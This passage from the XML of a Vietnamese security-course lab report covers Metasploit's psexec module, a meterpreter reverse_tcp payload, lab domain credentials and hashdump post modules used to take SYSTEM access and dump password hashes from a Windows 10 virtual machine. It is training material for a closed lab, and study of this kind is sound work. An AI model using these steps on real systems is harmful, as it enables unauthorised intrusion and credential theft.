        <w:t xml:space="preserve"> đã sử dụng một số phương pháp khác nhau để duy trì quyền truy cập các hệ thống Windows. Tùy chọn sử dụng tùy thuộc vào cấp độ truy cập và cách </w:t>
      </w:r>
      <w:r>
        <w:t>bạn chọn ẩn</w:t>
      </w:r>
      <w:r w:rsidRPr="003F61CF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B7E370" w14:textId="45B8D5BB" w:rsidR="00555E61" w:rsidRDefault="00555E61" w:rsidP="00431D3E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00555E61">
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidRPr="00555E61">
        <w:lastRenderedPageBreak/>
        <w:t>Lab 3.4: MSF psexec, hashdumping, and Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188756CB" w14:textId="6EB271D5" w:rsidR="00555E61" w:rsidRDefault="00555E61" w:rsidP="00555E61">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Mục tiêu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA1B516" w14:textId="1AF223D0" w:rsidR="00555E61" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:r>
        <w:t>Sử dụng module psexec trong metasploit để triển khai meterpreter payload đến máy đích window sử dụng giao thức xác thực SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3C2F54" w14:textId="00CF863A" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:r>
        <w:t>Khám phá khả năng của meterpreter trong việc leo thang đặc quyền và dump hash từ máy mục tiêu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700808C4" w14:textId="5AF99275" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Cài đặt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C379C4" w14:textId="061A6783" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:r>
        <w:t>Máy ảo sử dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637FE5DD" w14:textId="61BCB477" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Slingshot linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60476829" w14:textId="4DF5587A" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Window 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12509C5B" w14:textId="134B67C0" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:r>
        <w:t>Ping từ slingshot linux đến win10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFC4F80" w14:textId="191DEF9F" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C7E6CF9" wp14:editId="09274781">
            <wp:extent cx="6029325" cy="2352675"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="125565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8743" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6029325" cy="2352675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16101F8B" w14:textId="7ED4CE2B" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370BBCF4" w14:textId="4A4F372E" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Khởi động metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2CD4F5" w14:textId="0F1127A9" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="202B3CAA" wp14:editId="35C2F710">
            <wp:extent cx="5543550" cy="2028825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="194898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2260" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5543550" cy="2028825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F250E44" w14:textId="7BEB1501" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chọn module khai thác psexec</w:t>
      </w:r>
      <w:r w:rsidR="00C974CC">
        <w:t xml:space="preserve"> để tạo một service lên máy target</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F417F2" w14:textId="13D909C5" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="085886D0" wp14:editId="47388E89">
            <wp:extent cx="6496050" cy="619125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="134748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9232" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6496050" cy="619125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1F3022" w14:textId="2CDF3376" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:r w:rsidRPr="00414218">
        <w:t>Đối vớ</w:t>
      </w:r>
      <w:r>
        <w:t>i payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00414218">
        <w:t>, chúng tôi sẽ sử dụng giai đoạn Meterpreter với</w:t>
      </w:r>
      <w:r w:rsidR="006F2BDB">
        <w:t xml:space="preserve"> stager là</w:t>
      </w:r>
      <w:r w:rsidRPr="00414218">
        <w:t xml:space="preserve"> Reverse_tcp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F11801D" w14:textId="00CF03E7" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20D56207" wp14:editId="351E675C">
            <wp:extent cx="6810375" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="134969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90579" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6810375" cy="419100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CF8C11" w14:textId="190838EE" w:rsidR="00645AD4" w:rsidRDefault="00645AD4" w:rsidP="008325E8">
      <w:r>
        <w:t>Set RHOSTS đến máy target, LHOST tun0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428F0171" w14:textId="1F9C17B3" w:rsidR="00645AD4" w:rsidRDefault="00645AD4" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4245F06A" wp14:editId="1024E9CD">
            <wp:extent cx="5105400" cy="714375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="982220889"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0889" name="Picture 1" descr="A group of text on a white background&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5105400" cy="714375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44085E29" w14:textId="77777777" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:r>
        <w:t>Cấu hình</w:t>
      </w:r>
      <w:r w:rsidRPr="00652509">
        <w:t xml:space="preserve"> mô-đun khai thác psexec của bạn với tên miền hiboxy, tên người dùng bgreen và mật khẩu Pass</w:t>
      </w:r>
      <w:r>
        <w:t>word</w:t>
      </w:r>
      <w:r w:rsidRPr="00652509">
        <w:t xml:space="preserve">1. Người dùng hiboxy\bgreen nằm trong nhóm </w:t>
      </w:r>
      <w:r>
        <w:t>administrators</w:t>
      </w:r>
      <w:r w:rsidRPr="00652509">
        <w:t xml:space="preserve"> máy này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71329BCD" w14:textId="51C9EEF9" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AE1A3AB" wp14:editId="4D50AF76">
            <wp:extent cx="4895850" cy="1038225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="145533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38243" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4895850" cy="1038225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64644754" w14:textId="6299F3EB" w:rsidR="008325E8" w:rsidRDefault="008325E8" w:rsidP="008325E8">
      <w:r w:rsidRPr="00FB0237">
        <w:t>Trước khi khởi động cuộc tấn công, hãy xác nhận cài đặt là chính xác bằng cách chạy show options . Dưới đây là các tùy chọn để khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BBFA3D" w14:textId="67870EC0" w:rsidR="008325E8" w:rsidRDefault="00645AD4" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="434DB896" wp14:editId="598E73E5">
            <wp:extent cx="6858000" cy="3148330"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18383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138" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3148330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCAF526" w14:textId="2113B335" w:rsidR="00645AD4" w:rsidRDefault="00645AD4" w:rsidP="00645AD4">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chạy tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D605D" w14:textId="241B76F1" w:rsidR="00645AD4" w:rsidRDefault="0024133B" w:rsidP="00645AD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CAEC548" wp14:editId="1216ED00">
            <wp:extent cx="6858000" cy="1368425"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="560286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6295" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1368425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A89EAA0" w14:textId="77777777" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="0024133B">
      <w:r w:rsidRPr="00316A1A">
        <w:t xml:space="preserve">Lưu ý đầu ra hiển thị trên màn hình. Chúng ta có thể thấy các hành động sau được Metasploit thực hiện: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FAD032" w14:textId="77777777" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="0024133B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00316A1A">
        <w:t xml:space="preserve">Metasploit tự động khởi động trình xử lý đảo ngược lắng nghe trên cổng cục bộ 4444, chờ kết nối Reverse_tcp quay trở lại. LPORT mặc định là 4444 cho hầu hết các tải trọng Metasploit. Chúng ta có thể thay đổi điều đó bằng cách đặt LPORT thành một số giá trị khác. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C11E05C" w14:textId="77777777" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="0024133B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00316A1A">
        <w:t xml:space="preserve">Sau đó nó kết nối với máy chủ mục tiêu. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D90D3A" w14:textId="77777777" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="0024133B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00316A1A">
        <w:t xml:space="preserve">Nó xác thực máy mục tiêu là người dùng bgreen . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DD41D1" w14:textId="77777777" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="0024133B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00316A1A">
        <w:t xml:space="preserve">Sau đó nó nhận ra rằng mục tiêu đã cài đặt PowerShell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143296F1" w14:textId="77777777" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="0024133B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00316A1A">
        <w:t>Sau đó nó thự</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">c thi payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00316A1A">
        <w:t xml:space="preserve">bằng cách khởi động dịch vụ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D54EE0" w14:textId="5908C377" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="0024133B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00316A1A">
        <w:t xml:space="preserve">Nếu dịch vụ khởi động thành công, nó sẽ gửi </w:t>
      </w:r>
      <w:r w:rsidR="00E809F5">
        <w:t>stage</w:t>
      </w:r>
      <w:r w:rsidRPr="00316A1A">
        <w:t xml:space="preserve"> đến mục tiêu (tải nó lên bằng cách sử dụng stager). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593FD179" w14:textId="77777777" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="0024133B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00316A1A">
        <w:t>Và cuối cùng, chúng ta có phiên Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6C1FC5" w14:textId="1F57F9D8" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="0024133B">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DD064A" w14:textId="7E8DE8AB" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="00645AD4">
      <w:r w:rsidRPr="0026750F">
        <w:t xml:space="preserve">Bây giờ chúng ta đang ở trong phiên Meterpreter của mình. Để xem tài khoản người dùng mà </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ta </w:t>
      </w:r>
      <w:r w:rsidRPr="0026750F">
        <w:t>đang chạy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ta dùng lệnh</w:t>
      </w:r>
      <w:r w:rsidRPr="0026750F">
        <w:t xml:space="preserve"> getuid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F149C21" w14:textId="011E2242" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="00645AD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C14DC9E" wp14:editId="4760A4C4">
            <wp:extent cx="3209925" cy="400050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="75343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1523" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3209925" cy="400050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AECECB8" w14:textId="51C1FA09" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="0024133B">
      <w:r>
        <w:t>Ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00641A7E">
        <w:t xml:space="preserve"> có đặc quyề</w:t>
      </w:r>
      <w:r>
        <w:t>n SYSTEM, v</w:t>
      </w:r>
      <w:r w:rsidRPr="00641A7E">
        <w:t xml:space="preserve">ì vậy, </w:t>
      </w:r>
      <w:r>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00641A7E">
        <w:t xml:space="preserve"> bắt đầu với người dùng quản trị bgreen và sử dụng thông tin xác thực để thực thi mã dưới dạ</w:t>
      </w:r>
      <w:r>
        <w:t>ng SYSTEM thông qua psexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4227EF" w14:textId="431BD87A" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="0024133B">
      <w:r w:rsidRPr="00641A7E">
        <w:t>Bây giờ, với phiên Meterpreter, lấy các giá trị băm từ mục tiêu. Chúng ta sẽ sử dụng mô-đun post/windows/gather/smart_hashdump để trích xuất các hàm băm mật khẩu từ hệ thống. Mô-đun này sẽ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dump </w:t>
      </w:r>
      <w:r w:rsidRPr="00641A7E">
        <w:t xml:space="preserve">các hàm băm mật khẩu khác nhau tùy thuộc vào vai trò của hệ thống đích. Nếu mục tiêu là </w:t>
      </w:r>
      <w:r>
        <w:t>domain controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00641A7E">
        <w:t xml:space="preserve">, nó sẽ lấy mật khẩu theo cách khác và từ vị trí khác. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B02D48A" w14:textId="4B973279" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="0024133B">
      <w:r>
        <w:t>Kiểm tra module</w:t>
      </w:r>
      <w:r w:rsidRPr="00641A7E">
        <w:t xml:space="preserve"> smart_hashdump bằng lệ</w:t>
      </w:r>
      <w:r>
        <w:t>nh info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7310BF" w14:textId="7E9BADA4" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="00645AD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35617852" wp14:editId="530E8B83">
            <wp:extent cx="6858000" cy="5153660"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="13518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1057" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="5153660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="737D79DE" w14:textId="1CDDB63D" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="00645AD4">
      <w:r>
        <w:t>Chạy module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C6A784" w14:textId="4F82C4D9" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="00645AD4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66C69990" wp14:editId="7902AED7">
            <wp:extent cx="6858000" cy="3242310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="203844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2524" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3242310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00555F3A" w14:textId="2857E276" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="00645AD4">
      <w:r w:rsidRPr="00B2426F">
        <w:lastRenderedPageBreak/>
        <w:t>Lệnh chạy post/windows/gather/smart_hashdump cố gắng lấy gợi ý mật khẩu từ hệ thống nếu bất kỳ người dùng nào đã định cấu hình tài khoản của họ bằng gợi ý mật khẩu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AB60F3" w14:textId="77777777" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="0024133B">
      <w:r w:rsidRPr="00B2426F">
        <w:t>Tuy nhiên, tất cả các giá trị băm NT (phần thứ hai) là 31d6cfe0d16ae931b73c59d7e0c089c0 . Đây là hàm băm NT rỗng. Mô-đun này sẽ không hoạt động ở đây nhưng nó sẽ hoạt động trên</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> domain cotroller</w:t>
      </w:r>
      <w:r w:rsidRPr="00B2426F">
        <w:t xml:space="preserve">. Bây giờ chúng ta hãy thử một mô-đun khác. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D563020" w14:textId="1B57D5A2" w:rsidR="0024133B" w:rsidRDefault="0024133B" w:rsidP="0024133B">
      <w:r w:rsidRPr="00B2426F">
        <w:t>Chạy mô-đun post/windows/gather/hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60194BA0" w14:textId="2A8F24A6" w:rsidR="0024133B" w:rsidRDefault="009B77F6" w:rsidP="0024133B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="507DC00E" wp14:editId="6E43A00E">
            <wp:extent cx="6858000" cy="3686175"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1650632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2746" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3686175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
